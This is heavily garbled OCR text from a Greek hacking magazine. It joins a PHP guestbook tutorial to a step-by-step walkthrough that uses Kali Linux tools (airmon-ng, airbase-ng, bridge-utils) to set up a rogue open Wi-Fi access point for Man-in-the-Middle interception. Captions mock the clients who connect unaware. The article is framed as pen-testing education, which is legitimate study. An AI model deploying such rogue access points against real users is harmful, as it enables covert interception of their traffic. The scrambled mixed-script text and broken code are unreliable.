και δεν χρειάζεται να πούμε περισσότερα. Θα πρέπει όμως να σημειώσουμε µια крі- 
σιµη λεπτομέρεια για τη συμπεριφορά της сору: Όταν το αρχείο προορισμού υπάρ- 
χει ἠδη, η συνάρτηση αντιγραφἠς ro επικαλύπτει χωρίς να παραπονεθεἰ και χωρἰς 
να µας ειδοποιήσει! П' αυτό To λὀγο, πριν κάνουμε ша αντιγραφἠ εἶναι φρόνιμο να 
χρησιμοποιούμε και τη συνάρτηση file exists και να τσεκάρουµε αν υπάρχει поп το 
αρχείο προορισμού. 


Τέλος, η PHP περιλαμβάνει ша συνάρτηση για τη δηµιουργία καταλόγων, καθώς ка! 
ша yia τη διαγραφἡ καταλόγων: 


mdkir($dirname) ; 


rmdir($dirname) ; 


H πρὠτη µας εφαρµογή! 


Ὅπως εἰπαμε αρχικά, η εφαρµογἠ nou θα εξετάσουμε εἰναι Eva аплојко «βιβλίο 
επισκεπτὠν». Ὅσοι εἶχατε ασχοληθεἰ µε τη δηµιουργία ιστοσελίδων στο μακρινὸ na- 
ρελθὀν (πριν ano την ἐλευση του WEB 2.0), ενδἐχεται να θυμόσαστε Ori οι εταιρίες 
web hosting παρείχαν διάφορες εφαρμογές στους χρήστες, µε τη µορφή cgi script. 
Μια δηµοφιλἠς ефарџоуп του εἰδους ἦταν το «βιβλίο επισκεπτὠν». Н συγκεκριμένη 
εφαρµογἡ επέτρεπε στους επισκέπτες µιας ιστοσελίδας να αφήνουν δημόσια μηνύ- 
рата προς τον ιδιοκτήτη, συμπληρώνοντας µια κατάλληλη φόρμα. Φυσικά, η ἴδια 


lu | °°; 


deltaHacker 025 GuestBook Demo 


Є ё hitp://tab/questbook/index.php е1Ө- разорио P| + 
- ὑπ ^ 
deltaHacker 026 - PHP GuestBook Demo 
Message: 
+ Add message 9 
Place your message 
Ooops! 
No guest messages for the moment. 
Be the firstto leave опе! 
Error 
Please fill your nickname and the message area with some text. 
deltaHacker 026 GuestBook Demo deltaHacker nx 
UE @ чны деоба а Message: Διαβάζετε deltaHacker, Κάνει καλό!) 


— Add message 

Nickname: 

Н εφαρµογή µας ката τη λειτουρ- 

Мезад yia της. Εντάξει, ἰσως να то napa- 
ξηλώσαμε λίγο µε την εμφάνιση, 

алла εδώ στο deltaHacker έχουμε 


Place your message éva ҳой που δεν κρύβεται: Θέλου- 

µε ὁ,τι κάνουμε να γίνεται ὀμορφα 

сна — kai φυσικά σωστά :) 
@ 2013-11-25 14:45:09 


deltaHacker 
Message: Διαβάζετε deltaHacker, κάνει καλό!) uj 
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ефарџоућ φρόντιζε και yia την проВол όλων των αποθηκευμένων μηνυμάτων. Με 
τις γνώσεις που έχουμε αποκτήσει ως ropa, μπορούμε EUKOAG να φτιάξουμε Eva 
«βιβλίο επισκεπτὠν» στην PHP. 


Н λειτουργία της εφαρμογἠὴς εἶναι απλἠ. Μέσω µιας φόρμας, ο επισκέπτης TOU site 
θα δίνει Eva nickname και θα εισάγει ro επιθυµητὀ μήνυμα. Αυτά τα δεδομένα θα 
μεταφέρονται στον server ката την υποβολή της φόρμας και ano 'кє θα αποθη- 
κεύονται σε Eva αρχείο απλού κειμένου (plain text file). Τα δεδομένα ano τα πεδία 
της φόρμας (nickname και μήνυμα), ὁπως και η ημερομηνία που προστίθεται στο 
«πακέτο» αυτόματα, αποθηκεύονται σε µια μόνο γραμμὴ και χωρίζονται μεταξὺ τους 
µε τον χαρακτήρα TAB. Το πρὀγραμμἁ µας Ва διαβάζει το εν λόγω αρχείο γραμμή 
προς γραμμή, θα αναλύει τα δεδομένα και θα τα παρουσιάζει στον browser του 
επισκέπτη. Μπορείτε να κατεβάσετε τον πλήρη koóika της εφαρμογἠς µας апо то 
http://bit.ly/dh027guestbooksrc. Στη συνέχεια θα εξετάσουμε τη λειτουργία του KO- 
δικα, трпратіка. Па να διευκολύνουμε τη μελέτη έχουμε αφαιρέσει τις περισσότερες 
ετικέτες HTML και τα αποσπάσματα που ακολουθούν περιέχουν σχεδόν αποκλειστι- 
ка τον κὠδικα σε PHP. 


07 define('FILE','../ext_storage/data') ; 
08 $savedGood = true ; 
09 $emptyForm = false ; 


Ξεκινώντας ορίζουµε τη σταθερά FILE, η οποία περιέχει τη διαδρομή προς το αρχείο 
опоо θα διατηρούνται τα μηνύματα των επισκεπτών. Μια καλὴ πρακτικἠ εἶναι η δια- 
δροµἠ του αρχείου να βρίσκεται £&o ano τη pia του Document Root, ETO! ὥστε та 
περιεχόμενα του αρχείου να µην εἶναι ἄμεσα προσβάσιμα апо τον ιστὀ. Πα την εφαρ- 
μογἠ µας αυτὸ δεν εἶναι καθόλου σημαντικὀ, αλλά πρὀκειται για ша кал τακτική 
και οφείλαμε va την αναφέρουμε ;) Στις γραμμὲς 08 και 09 ορἰζουμε δύο µεταβλη- 
TEC, HE τη βοήθεια των οποίων θα μπορούμε αργότερα va εντοπἰζουµε ὀποια офал- 
рата συμβαίνουν κατὰ τη λειτουργία του προγράµµατος kai ма τα αντιμετωπίζουμε. 


12 function clear text($text)( 
13 return str_replace(array("\t","\n"), array(" "," "), $text) ; 
14 ) 


Н συνάρτηση nou ξεκινάει στη γραμμὴ 12 απαλεἰφει ορισμένους ανεπιθύμητους 
χαρακτήρες апо το μήνυμα του χρήστη. Συγκεκριµένα, απαλεἰφει τον χαρακτήρα 
TAB και εκείνον της αλλαγής γραμμής. Αυτὸ εἶναι αναγκαίο, εξαιτίας του τρόπου 
αποθήκευσης των δεδομένων στο αρχείο. Н αφαίρεση των χαρακτήρων γίνεται µε 
τη βοήθεια της συνάρτησης str_replace. Σ' αυτή δίνουμε емам пмака µε τους xapa- 
κτήρες που θέλουμε va ξεφορτωθούμε, καθώς κι ἑναν пмака µε τους χαρακτήρες 
που θα αντικαταστήσουν τους ανεπιθύμητους. 


16 if(isset($ POST['nickname']) 88 isset($ POST['message']))( 


17 $nickname = trim(clear text(htmlspecialchars(strip tags($ 
POST['nickname'])))) ; 

18 $message = trim(clear text(htmlspecialchars(strip tags($ _ 
POST['message'])))) ; 

19 if($nickname == "" || $message == ""){ 

20 $emptyForm - true ; 
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21 }е1ѕе{ 

23 $data = date("Y-m-d H:i:s")."\t".$nickname."\t".$message."\n" ; 
24 $savedGood = file put contents(FILE, $data, FILE APPEND) ; 

25 ) 

26 ) 


Στη γραμμή 16 ελέγχουμε av o πίνακας _POST περιλαμβάνει τα στοιχεία nickname 
Kal message. Αν ισχύει κάτι τέτοιο, о κὠδικας θεωρεἰ оп έγινε υποβολἠ της φόρμας 
και ÒTI EXOUV φτάσει τα δεδομένα ενὸς νέου μηνύματος. Στις γραμμὲς 17 και 18 
EKTEAOUHE vav καθαρισμό των εισερχόμενων δεδοµένων µέσω µιας «τηλεσκοπι- 
κής», av µας επιτρέπεται о ὀρος, κλήσης τεσσάρων συναρτήσεων. Με αυτό EVVOOU- 
µε Оті οι συναρτήσεις καλούνται αλυσιδωτὰ και η τιµή που επιστρέφει καθεμία δίνε- 
ται σαν παράμετρος στην епоџемп. Αντίθετα µε ro noc διαβάζουμε τις γραμμὲς µε 
TOV κὠδικα, η κλήση των συναρτήσεων ξεκινάει апо δεξιὰ προς τ' αριστερά: Прота 
η strip tags, μετά η htmlspecialchars, στη συνέχεια η clear text και τέλος η trim. 


Στη γραμμὴ 19 ελέγχουμε av ο χρήστης συμπλήρωσε όλα τα πεδία της φόρμας και, 
τέλος πάντων, TO ам ἐχουν κάποια τιμή οι αντίστοιχες μεταβλητὲς. Αν κἄποια апо τις 
џетаВАптес δεν ἐχει τιµή, δίνουμε στη μεταβλητή emptyForm την τιμὴ true (γραμμή 
20). Διαφορετικά, δημιουργούμε µια συμβολοσειρά που αποτελείται апо την трехоџ- 
σα ημερομηνία και ора, ἑναν χαρακτήρα TAB, την τιµή της μεταβλητής nickname, 
ἑναν ακόµα χαρακτήρα TAB, την τιµή της µεταβλητἠς message και, τέλος, ἑναν xa- 
ρακτήρα αλλαγἠς γραμμής. Όπως καταλαβαίνετε, ολόκληρη аот η συμβολοσειρά 
θα γραφτεἰ στο αρχείο αποθήκευσης των μηνυμάτων. Па τη συμβολοσειρά µε την 
ημερομηνία χρησιμοποιούμε τη συνάρτηση date, η οποία επιστρέφει την τρέχουσα 
ημερομηνία και ора. Н μορφοποίηση aurov των δεδομένων καθορἰζεται апо την 
«παράμετρο μορφοποίησης» που δίνουμε στη συνάρτηση date?. Πριν προχωρήσου- 
με, πρέπει να σταθούμε σε µια λεπτομέρεια: Н ора που επιστρέφει η date εἰναι 
εκείνη TOU server και OXI εκείνη του υπολογιστή του χρήστη! 


Στη γραμμή 24 προσθέτουμε τα νέα δεδομένα στο αρχείο διατήρησης των μηνυμὰ- 
των, χρησιμοποιώντας τη συνάρτηση file put. contents. Паратпрпоте oT! για ма 
πετύχουμε την εγγραφὴ των νέων δεδομένων χωρἰς την επικάλυψη των παλιών, 
δίνουμε και την παράμετρο ΕΠΕ APPEND. Επιπλέον, αποθηκεύουµε την τιµή που 
επιστρέφει η file put. contents στη μεταβλητή saveGood, για να γνωρίζουμε аруо- 
тера αν η εγγραφή ολοκληρώθηκε µε επιτυχία. 


28 $entries = file(FILE) ; 


Στη γραμμὴ 28 χρησιμοποιούμε τη συνάρτηση file και φορτώνουμε ὀλεςτις γραμμές 
του αρχείου σε емам πἰνακα µε το омоџа entries. 


57 «form name-"messageadd" method="post" action="index.php"> 


58 «label for-"nickname"»Nickname:«/label» 

59 «input name="nickname" id="nickname" type="text"> 
60 «label for-"message"»Message:«/label» 

61 «textarea name-"message" id-"message"» «/textarea» 


2. Μπορείτε va µελετήσετε τη συνάρτηση date και τις τιμὲς που δέχεται η παράμετρος μορφοποίησης, апо την τεκμηρίωση της PHP στη 
διεύθυνση http://php.net/manual/en/function.date.php 
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62 <input type="submit" value-"Place your message"» 
63 «/form» 


Προφανώς, auró ro апоспаоџа δεν περιέχει κὠδικα РНР. Εδὠ βλέπουμε τον κὠδι- 
κα HTML που δημιουργεὶ τη φόρμα εισαγωγἠς μηνυμάτων. Ката την υποβολή της 
φόρμας, τα δεδομένα μεταφέρονται µε την μέθοδο POST και κατευθύνονται προς то 
αρχείο index.php - δηλαδή αυτό που εξετάζουμε Non! Ακριβώς yi! αυτό, στην αρχἠ 
TOU κὠδικα ελέγχουμε ам ἐχουν φτάσει δεδομένα µε τη μέθοδο POST, αν ἐχει opi- 
оті το nickname, αν ἐχει δοθεἰ капою μήνυμα κ.λπ. 


"n" , 
J 


66 $errorMsg = 


67 if($savedGood === false) 

68 $errorMsg = "Your message hasn't been saved.<br>Please contact the 
webmaster or try again later." ; 

69 

70 if($emptyForm == true) 

71 $errorMsg .- "Please fill your nickname and the message area with 
some text." ; 

72 

73 if($errorMsg != ""){ 

74 echo ‘<ul data-role-"listview" data-inset="true">'; 

75 echo ‘<li data-role-"list-divider"»Error«/li»'; 

76 echo "<li> «p» <strong>$errorMsg</strong> </p> </li> </ul>" ; 

77 } 


Ακριβώς като апо τη φόρμα θα εμφανίζονται τα μηνύματα της εφαρµογἠς και, ακο- 
λούθως, αυτά των επισκεπτὠν. Έτσι, στη γραμμὴ 66 ορἰζουμε ша κενὴ μεταβλητή 
µε ὀνομα errorMsg και η οποία, ὅπως πιθανὸν μαντεύετε, θα συγκεντρώσει τις NEPI- 
γραφὲς ano ова σφάλματα ¿xouv προκύψει. Στη συνέχεια, στη γραμμὴ 67 ελἐγχου- 
με αν η µεταβλητὴ saveGood ἐχει την τιμὴ false. Τσεκάρουμε δηλαδἠ av EXE! συμβεὶ 
κάποιο σφάλμα αποθήκευσης ἡ ὀχι. Αν ισχύει κάτι τέτοιο, αποδίδουµε Eva σχετικὀ 
μήνυμα στην μεταβλητή errorMsg. Στη γραμμὴ 70 ελέγχουμε av ο χρήστης опёВа- 
λε τη φόρμα αφήνοντας κάποιο πεδίο κενὀ. Σε αυτή την περίπτωση, προσθέτουμε 
TO σχετικὀ μήνυμα στη μεταβλητή errorMsg. Τελειώνοντας µε τους ελέγχους, στη 
γραμμή 73 τσεκάρουµε av η μεταβλητή errorMsg εἶναι κενἠ ἡ ὀχι. Αν OXI, єрфамі- 
ζουμε την τιμὴ της! 


82 if($entries === false){ 

83 echo "<11><ћ3>00оор5 !</ћ13>" ; 

84 echo "<p>No guest messages for the moment...</p><p>Be 
the first to leave опе!</р></11>" ; 

85 γε] ςεί 

86 $entries = array_reverse($entries) ; 

87 foreach($entries as $entry){ 

88 $entryArray = explode("\t", gentry) ; 
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89 echo "<li><p><em>@ $entryArray[0] </em></p>" ; 

90 echo "«h3» $entryArray[1] </h3>" ; 

91 echo "«p»«strong»Message:«/strong» $entryArray[2] 
«/p»«/li»" ; 

92 } 

93 } 


> ара EXE] η εμφάνιση των μηνυμάτων των επισκεπτὠν. Ξεκινάμε (γραμμὴ 82) µε 
емам ἐλεγχο της μεταβλητἠς entries. Av αυτἠ ἐχει την τιμή false (κἀτι nou συµβαἰ- 
νει όταν το αρχείο μηνυμάτων εἶναι κενό) εµμφανἰζουµε TO σχετικὀ μήνυμα και µια 
npotponn. Αν о πἰνακας ἐχει περιεχόμενα, φροντίζουμε yia την napouoiaor| τους. 
Αρχικά πραγματοποιούμε ша αντιστροφἠ της σειράς των στοιχείων rou nivaka, xpn- 
σιμοποιώντας τη συνάρτηση array. reverse. AUTO το κάνουμε γιατὶ θέλουμε ма ra 
εμφανίσουμε ξεκινώντας апо TO νεότερο και καταλήγοντας στο παλιότερο”. AKO- 
λούθως, επεξεργαζόµαστε τα στοιχεία του пмака Eva прос Eva, αξιοποιώντας гмам 
βρόχο foreach. Н επεξεργασία πραγματοποιείται µε τη συνάρτηση explode, η onoia 
«διασπάει» κάθε στοιχείο του πίνακα (δηλαδἠ κάθε γραμμή του αρχείου) σε τρία 
στοιχεία. Αυτή η διάσπαση πραγματοποιείται µε χαρακτήρα διαχωρισμού то TAB. 
Τέλος, στις γραμμὲς 89 ἑως 91, προβάλλουμε καθένα апо αυτά τα πεδία. 


EniAoyoc 


Ејџасте σἰγουροι ὁτι δεν δυσκολευτήκατε καθόλου ма κατανοήσετε TOV κὠδικα. 
Επομένως, πιστεύουμε ὁτι σας αξίζουν συγχαρητήρια! Μόλις κατανοήσατε τον τρόπο 
λειτουργίας µιας ολοκληρωμένης εφαρμογἠς σε PHP και, Kári µας λέει, от: πλέον 
εἶστε σε θέση να φτιάξετε και τις δικὲς σας. Πριν εµβαθύνουμε τη yvopipia µας µε 
το περιβάλλον LAMP, µπορείτε va πειραματιστεῖτε µε τον κὠδικά µας, να том тропо- 
ποιήσετε ἡ και va τον αγνοήσετε, ὥστε να ξεκινήσετε τη δηµιουργία µιας δικἠς σας 
ефарџоупс ano το μηδὲν! Μέχρι το епоџемо τεύχος του περιοδικού, φροντίστε ма 
εξασκηθεἰτε OOO περισσότερο γίνεται και πάνω an' όλα να διασκεδάσετε :) 


3. Ἡ αλήθεια εἶναι ὁτι θα μπορούσαμε να τα παρουσιάσουμε µε οποιαδήποτε σειρά, χωρὶς va κάνουµε αναδιάταξη των στοιχείων του πίνακα. 
Στην πραγματικότητα, θέλαμε μόνο ма σας δείξουμε τη συνάρτηση array. reverse. 
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Skill: Intermediate 
Tags: wireless, bridging, Man-in-The-Middle, МіТМ, Kali 


Н δημιουργία ενός wireless access point για επιθέσεις МІТМ αποτελεἰ 
αγαπημένη δραστηριότητα ὅσων ασχολούνται µε ro pen-testing ἡ oro 
απλά ενδιαφἑρονται yia την ασφάλεια δικτύων. Στο παρὸν κείμενο 
παρουσιάζουμε, αναλυτικά και βήμα προς βήμα, £vav πρωτότυπο τρόπο 
nou µας επιτρέπει va εξαπολύουμε επιθέσεις του εἶδους εὔκολα, γρήγορα κι 
αποτελεσματικἀ. 


by зибггаш 


Επιθέσεις Man-in-The-Middle, µε wireless bridging 
LL 


Кака τα ψέμματα. Έστω ма ша фора μόνο --και πάντα yia καθαρὰ EknaldeuTIKOUG 
λόγους-- ὁλοι έχουμε ασχοληθεἰ µε то σπορ. Пера апо τον συνήθη τρὀπο yia την 
υλοποίηση µιας επίθεσης ΜΙΤΜ µε τη βοήθεια ενὸς wireless access point (WAP ἡ 
απλά ΑΡ), υπάρχει κι гмас τρόπος που δεν εἶναι τόσο δηµοφιλἠς. To γεγονὸς αυτό 
εἶναι μάλλον παράξενο, ὁπως θα διαπιστώσετε σε Муо. Πριν εξηγηθούμε, ας nepi- 
γράψουμε το περιβάλλον της εργασίας µας. 


Βρισκόμαστε, λοιπὸν, στο Kali Linux, έχουμε πλήρη πρὀσβαση στο Internet ка! δια- 
θέτουµε емам USB WiFi adapter rov onoio το Kali αναγνωρίζει και συνεργάζεται ἀψο- 
үа pači του. Ένας τέτοιος adapter εἶναι η καρτούλα AWUS 036h της Alfa, την onoia 
τόσες φορὲς έχουμε επιστρατεύσει για τους πειραματισμούς µας. Προκειμένου ropa 
να προσελκύσουμµε wireless clients στο box µας και ν' αρχίσουμε την καταγραφή 
των δικτυακών πακέτων που στέλνουν και δέχονται (επίθεση Man-in-The-Middle), 
μπορούμε να ακολουθήσουμε την πεπατηµένη. Όποτε το κάνουμε, εργαζὀµαστε ως 
ακολούθως: 


ο φτιάχνουμε Eva wireless access point 
ο αποδἰίδουµε στο WAP ша κατάλληλη για το ӧіктио µας διεύθυνση IP 


ο στήνουμε ¿vav DHCP server, o опојос μοιράζει διευθύνσεις IP και πληροφορίες 
DNS στους wireless clients του AP 


e εμπλουτίζουμε ro routing table του πυρήνα 


ο ορἰζουμε τους κατάλληλους κανόνες yia To iptables, ὥστε oi clients Tou AP va 
επικοινωνούν απρόσκοπτα µε μηχανήματα στο Internet 


ο φροντίζουμε WOTE να εἶναι ενεργοποιημένο το IP forwarding, μεταξύ των 
network interfaces. 


Υπάρχει όμως KI ἑνας πολύ πιο σύντομος δρόμος: 
ο φτιάχνουμε Eva wireless access point 


ο δημιουργούμε Eva bridge interface nou γεφυρώνει δύο ακριβὼς network 
interfaces: εκεἰνο nou αντιστοιχεἰ στο AP κι £keivo апо το опојо ro Kali βγαίνει 
στον έξω κόσμο 


ο αποδἰίδουµε στο bridge interface µια κατάλληλη, για то δίκτυο στο οποίο avn- 
κει το Kali, διεύθυνση IP 


ο φροντίζουμε WOTE να εἶναι ενεργοποιημένο το IP forwarding, μεταξύ των 
network interfaces. 


Όπως εἰναι φανερό, η δεύτερη οδὀς εἶναι πολύ πιο σύντομη. То от! δεν ακολουθείται 
συχνὰ, ἴσως οφείλεται στο γεγονὸς Ori το bridging ως έννοια δεν εἶναι και τόσο δι- 
адедоџемп. Εσεἰς βέβαια διαβάζετε deltaHacker, οπὀτε μάλλον ἐχετε NON μάθει όλα 
ова χρειαζόσαστε yia To bridging (βλ. арӨро στη σελ. 40). Ας δούμε, λοιπὸν, πὠς 
εξαπολύουμµε ша επίθεση ΜΙΤΜ, στηριζόμενοι στο λεγόμενο wireless bridging. 


Σημείωση. Av κι о USB adapter που επιστρατεύουμε, προκειµένου να στήσου- 
µε το WAP µας, εἶναι пера για пера αληθινός, το Kali Linux εἶναι εγκαταστημέ- 
νο σε EIKOVIKO υπολογιστή Kal συγκεκριµένα σε VirtualBox VM. Σε περίπτωση που 
θελήσετε va µας μιμηθείτε, ενδεχομένως αυτό ro ἀρθρο va σας φανεί χρήσιμο: 
http://deltahacker.gr/?p=9070 
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Вђџа 1 
Ano ἑνα παράθυρο τερματικού ελέγχουμε av o wireless USB adapter αναγνωρίζεται 
ano то Kali: 

root@kali64cus :~# 

Interface Chipset Driver 

м1апе Realtek RTL8187L rt18187 - [рћуд] 


Αν την πρώτη фора που θα δώσετε την παραπάνω EvTOAN δεν πάρετε τίποτα στην 
ἐξοδό της, αποσυνδἑστε τον USB adapter, συνδέστε τον ξανὰ, περιμένετε àiya δευ- 
теролепта και δώστε την EVTOAN ξανά. 


J ~: airodump-ng у) 4) (х 


File Edit View Bookmarks Settings Help 


CH 1 ][ Elapsed: 3 mins ][ 2013-12-29 21:46 


PWR Beacons #Data, #/s 


о 
I 


CIPHER AUTH ESSID 


-41 97 84 
-58 122 0 
-57 3 
-57 15 
-57 13 
-59 46 
-59 39 
-60 
-59 
-62 
-62 
-62 
-63 
-63 
-63 
-65 


CCMP PSK Parabing Creations 
CCMP PSK OTEDE8434 
WEP Thomson12C408 
WEP Thomson3B2D44 
CCMP PSK CAVALLI 
Sundays Hot Spot B 
CCMP PSK HOL ALU WLAN 
CCMP PSK PHILIPS 
TKIP PSK CYTA3FAFD2 
CCMP PSK hol - NetFasteR WLAN 3 
WEP ThomsonAF589C 
CCMP PSK Wind WiFi 7E7DB8 
TKIP PSK Охудеп- 05085 
CCMP PSK conn-x20b360 
CCMP PSK CYTA 2E27 
TKIP PSK HOL13 
TKIP PSK Oxygen-77065 
CCMP PSK NETGEAR 
CCMP PSK Wind WiFi yVQEGW 
CCMP PSK Fidelio 
CCMP PSK *zaf* 
CCMP PSK conn-x2014b0 
CCMP PSK Iraklis 1908 
CCMP PSK hol - NetFasteR WLAN 3 
CCMP PSK ThomsonA2F59B 
WEP othellos 
CCMP PSK аројоћп 
CCMP PSK 6B2C53 
WEP kprokopi 


m 


m 
NP RPRPRORPORRFOOF 


ere 
N I| 


-64 
-65 
-65 
-67 
-69 
-63 
-63 
-67 
-65 


4 
C 
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D 
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1 
7 
2 
Е 
C 
8 
А 
0 
7 
C 
1 
А 
2 
7 
18 
0 
4 
9 
D 
6 
8 
3 
A 


OOOOOOO0OO0O0O0O0o0o0o0o0oooooooooooocooco 


eoooorooomooocooroonooow 


STATION Rate Lost Frames Probe 


= 
о 
N 


associated) 
associated) 
associated) 
associated) Thomson155C42 


Parabing Creations 


00 UJ) O» O HF н U! uU UJ QO UO OC 
О-ОООС те КМ је | н н 
o 


»»0F^PCoooczdo 
οοσοσσσσσσσσ 


Па ~:airodump-ng 


Ένας τρόπος yia va £Aéy&ouye от! δουλεύει σωστά 
To monitoring interface Tou Wireless Access Point 
μας, εἶναι να ρίξουμε ша ματιὰ στη γειτονιά. Στη 
δική µας γίνεται, κλασικά, ο χαμός! 
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Βήμα 2 
Δημιουργούμε Eva monitoring interface: 
root@kali64cus:~# airmon-ng start wlan@ 
Found 1 processes that could cause trouble. 
If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


-e 
PID Name 

1812 dhclient 

Interface Chipset Driver 

м1апе Realtek RTL8187L rt18187 - [phye] 


(monitor mode enabled on mon?) 
Αν, ὁπως oro παρἀδειγμάἁ µας, дајте Kå- 
ποια προειδοποίηση περὶ tou dhclient, 
αγνοήστε τη. (Av έχετε ακολουθήσει ni- < Settings Wi-Fi 
ота том odnyo στο http://deltahacker. 


eeeeo COSMOTE = 12:04 4 100% E4 


gr/?p-9070, τότε δεν ба δείτε κάποια Wi-Fi ο 
σχετικἠ προειδοποίηση.) 
Βήμα 3 ~ Parabing Creations аё = (i) 


Προαιρετικἀ, ρίχνουμε ша ματιὰ στα 
ασύρματα δίκτυα της περιοχἠς µας: 


root@kali64cus:~# airodump-ng топе СУ МЕ 

Τερματίζουμε ro airodump pE том συνδυ- CharactersWelcome = © 

асро πλήκτρων [CTRL+C]. 

Βήμα 4 Thomson12C408 а = (1) 

Δημιουργούμε κι ενεργοποιούμε éva 

wireless access point µε ónoio ὀνομα θὲ- Other... 

AOUHE, TO onoio екпеџпе! στο κανάλι της 

επιλογής µας: 
root@kali64cus:~# airbase-ng Ack to Join Networks Ф) 
--essid CharactersWelcome -c 11 
Nang Known networks will be joined automatically. 
12:03:40 Created tap interface If no known networks are available, you will 
ato be asked before joining a new network. 
12:03:40 Trying to set MTU on ate To WAP µας εἶναι гтошо ка! oi wireless 
to 1500 clients ro βλέπουν, ωστόσο δεν μπορούν 


акбџп να συνδεθούν c' αυτό. 
12:03:40 Trying to set MTU on топе to 1800 


12:03:40 Access Point with BSSID 0@:C@:CA:52:AB:B4 started. 


Στο παράδειγµα nou μόλις δώσαμε δημιουργήσαμε Eva ασύρματο опџејо 
πρόσβασης µε ὀνομα CharactersWelcome, το οποίο εκπέμπει στο κανάλι 11. 
Πλέον, ano κάποιον wireless client, ὅπως, π.χ., εἶναι Eva laptop ἡ Eva smartphone, 
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nnyaivovrac στο εργαλείο αναζήτησης ασύρματων δικτύων θα πρέπει va βλέπουμε 
κι αυτό το CharactersWelcome. Βέβαια δεν μπορούμε ακόµα να συνδεθούμε σ' 
αυτό, εἶναι όμως εκεῖὶ. Апо Eva ἄλλο τερματικό, βλέπουμε ro network interface 
που αντιστοιχεί στο WAP που μόλις ενεργοποιήσαμε: 
root@kali6é4cus:~# ifconfig -a 
ate Link encap:Ethernet HWaddr 00:c0:ca:52:ab:b4 
BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 еггог5:д dropped:0 омеггип5:д frame:0 
TX packets:0 errors:0 dropped:0 омеггип5:д carrier:0 
collisions:@ txqueuelen:500 
RX bytes:0 (0.0 B) TX bytes:@ (0.0 B) 
еһе Link encap:Ethernet HWaddr 68:00:27 :5с:32:95 


inet addr:192.168.80.103 Bcast:192.168.80.255 
Mask:255.255.255.0 


inet6 addr: fe80::a300:27ff:fe5c:3295/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:43 еггог5:д dropped:0 омеггип5:д frame:0 
TX packets:21 errors:0 dropped:0 overruns:0 carrier:@ 
collisions:@ txqueuelen:1000 


RX bytes:13262 (12.9 KiB) TX bytes:8900 (8.6 KiB) 


To ὀνομα Tou interface yia то WAP εἶναι то ар. Κάνουμε και ша νοητἠ υποσημείωση 
yia то ὀνομα του network interface апо To onoio το Kali βγαίνει στον ἑξω κόσμο: Па 
еџас ἦταν ro ethO, ката πάσα πιθανότητα auro θα εἰναι και yia 'oac. 


eeeeo COSMOTE = 13:09 eeeeo COSMOTE = 13:09 1 100% (889 + 


€ Settings Wi-Fi € Wi-Fi CharactersWelcome 


Wi-Fi Forget this Network 


v CharactersWelcome Αφού ro network 
interface Tou WAP IP ADDRESS 
γεφυρωθεί µε то ето 
CHOOSE A NETWORK... interface Tou Kali, o1 DHCP 
wireless clients μπορούν 
OTEDE8434 = να συνδέονται аугта IP Address 192.168.80.104 
στο ελεύθερο ασύρ- 
Parabing Creations Ξ џато δίκτυο µε буора Subnet Mask 255.255.255.0 
CharactersWelcome. Δεν 


Thomson12C408 да ro αποτολμούσαν, Router 192.168.80.1 
av ἠξεραν πού πάνε να 


Other μπλέξουν... 


DNS 192.168.80.1 


Search Domains parabing.net 


Ask to Join Networks Client ID 
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2013/12/29 | 2013/12/29 
14:09:22 16:09:22 


2013/12/29 | 2013/12/30 
14:08:56 14:08:56 


2013/12/29 | 2013/12/29 
14:07:56 16:07:56 


2013/12/29 | 2013/12/29 
14:06:54 16:06:54 


2013/12/29 | 2013/12/29 
14:06:09 16:06:09 


2013/12/29 | 2013/12/29 
14:03:58 16:03:58 


192.168.80.103 5 kali64cus offline 


192.168.80.104 5 subZrawsiPhone4 online 


192.168.80.108 : android_95 online 


192.168.80.107 У citropad online 


192.168.80.106 : blackbook online 


192.168.80.105 3 iMac24 online 


Show all configured leases 


pfSense is © 2004 - 2013 by Electric Sheep Fencing LLC. АН Rights Reserved. [view license] 


Οι wireless clients Tou CharactersWelcome ка! ra IP που τους 
έχουν аупото оте! δυναμικά, апо том DHCP server στον 
router μπροστὰ ano то Kali Linux. 


βήμα 5 
Ἠρθε n opa va φτιάξουμε Eva bridge interface nou θα γεφυρώνει та ако και ећћо. 
Χρειαζόμαστε та λεγόμενα bridge utilities, τα onoia ката ndoa πιθανότητα δεν θα 
εἶναι εγκατεστημένα: 
гоої@Ка1164сиѕ:~# apt-get install bridge-utils 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following NEW packages will be installed: 
bridge-utils 
Ө upgraded, 1 newly installed, © to remove and 0 not upgraded. 
Need to get 0 B/36.1 kB of archives. 
After this operation, 146 kB of additional disk space will be used. 
Selecting previously unselected package bridge-utils. 
(Reading database ... 317241 files and directories currently installed.) 
Unpacking bridge-utils (from .../bridge-utils 1.5-6 amd64.deb) ... 
Processing triggers for man-db 
Setting up bridge-utils (1.5-6) ... 
Φτιάχνουμε тора Eva bridge interface, µε µέλη ra atO και ethO: 
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root@kali64cus :~# 

root@kali64cus :~# 

root@kali64cus :~# 

root@kali64cus :~# 

bridge name bridge id STP enabled interfaces 

wirelessBridge 8000.00c0ca52abb4 no ајд 

еһе 

Παρατηρήστε от! то δικὀ µας bridge interface то омоџаваџе wirelessBridge. Фромт!- 
ζουμε ακολούθως ώστε та atO kai ethO να εἶναι емеруа, αλλά χωρίς διευθύνσεις ІР: 

root@kali64cus :~# 

root@kali64cus :~# 


Aivouue στο bridge interface ша διεύθυνση IP κατάλληλη үа To LAN µέσα στο οποίο 
βρίσκεται To Kali. Στην περίπτωση rou δικού µας δικτύου, о DHCP server στον router 
μπροστὰ апо To Kali μοίραζε διευθύνσεις апо την περιοχὴ 192.168.80.100-150. Επι- 
λέξαμε va αντιστοιχίσουµε χειροκἰνητα µια OTATIKN διεύθυνση IP στο wirelessBridge, 
η οποία ἦταν εκτός του προαναφερθέντος εὐρους και δεν χρησιμοποιούταν апо Ka- 
мемам ἄλλον υπολογιστή. 


root@kali64cus :~# 

root@kali64cus :~# 

wirelessBridge Link encap:Ethernet HWaddr 00:c0:ca:52:ab:b4 
inet addr:192.168.80.10 Bcast:192.168.80.255 Mask:255.255.255.0 
inet6 addr: fe80::2c0:caff:fe52:abb4/64 Scope:Link 


a tbash 
fle Edit View Bookmarks Settings Help 
root@kalié4cus:~# ifconfig -a 

Link encap:Ethernet HWaddr 00:c@ 

inet6 addr: fe80::2cO:caff :fe52:abb4/64 Scope:Link 

